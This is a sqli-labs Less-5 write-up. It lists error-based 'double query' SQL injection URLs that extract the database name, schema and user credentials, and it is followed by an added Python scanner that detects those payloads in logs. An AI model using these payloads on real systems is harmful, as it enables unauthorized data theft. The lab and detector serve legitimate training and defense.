Less-5-02
阿新 • Published: 2020-08-14
0x01 Determine the injection type
String-based, single quote, double injection
?id=1
?id=1'
?id=1"
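Single-quote string-based injection: requests 1 and 3 display "You are in", request 2 (single quote) produces an error
0x02 Determine the number of columns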
?id=1'order by 3--+
#The number of columns is 3
?id=-1' union select 1,2,3--+
#Nothing is echoed back
0x03 Determine the database name with double injection
?id=-1' union select 1,count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a--+
#The database name obtained is security
0x04 Determine the table names
?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a--+
#For unknown reasons the table names are not displayed
0x05 Determine the column names
?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand()*2)) as a from information_schema.tables group by a--+
#The column names are not displayed
0x06 Retrieve the data
?id=-1' union select 1,count(*),concat_ws('-',(select concat_ws('-',id,username,password) from users limit 0,1),floor(rand()*2)) as a from information_schema.columns group by a--+
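A defender's view of the requests above, as an added example that is not part of the original post: a Python scanner that flags the quote probe, the ORDER BY column count, and the count(*) / floor(rand()) / GROUP BY double-query pattern in web access logs. The log format, the /Less-5/ path, and the rule names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (not real traffic); format and paths are assumptions.
SAMPLE_LOG = [
    '10.0.0.5 "GET /Less-5/?id=1 HTTP/1.1" 200',
    '10.0.0.5 "GET /Less-5/?id=1%27 HTTP/1.1" 200',
    '10.0.0.5 "GET /Less-5/?id=1%27order%20by%203--+ HTTP/1.1" 200',
    '10.0.0.5 "GET /Less-5/?id=-1%27%20union%20select%201,count(*),concat_ws(%27-%27,'
    '(select%20database()),floor(rand()*2))as%20a%20from%20information_schema.tables'
    '%20group%20by%20a--+ HTTP/1.1" 200',
    '10.0.0.9 "GET /index.php?q=order+by+phone HTTP/1.1" 200',  # benign search text
]

RULES = {
    "quote_probe": re.compile(r"^-?\d+['\"]$"),            # numeric id plus a lone quote
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),   # column counting
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
}
# Double-query signature: all three fragments must appear in the same value.
DOUBLE_QUERY = [re.compile(p) for p in
                (r"count\s*\(\s*\*\s*\)", r"floor\s*\(\s*rand\s*\(", r"\bgroup\s+by\b")]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the sorted rule names matched by one decoded parameter value."""
    v = re.sub(r"\s+", " ", value.lower()).strip()
    hits = {name for name, rx in RULES.items() if rx.search(v)}
    if all(rx.search(v) for rx in DOUBLE_QUERY):
        hits.add("double_query")
    return sorted(hits)

def scan(lines):
    """Return (line_number, parameter, hits) for every suspicious parameter."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qsl percent-decodes the value and turns '+' into a space
        for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((n, key, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The rules match on decoded parameter values, so they complement rather than replace parameterized queries and suppressed database error output on the server side.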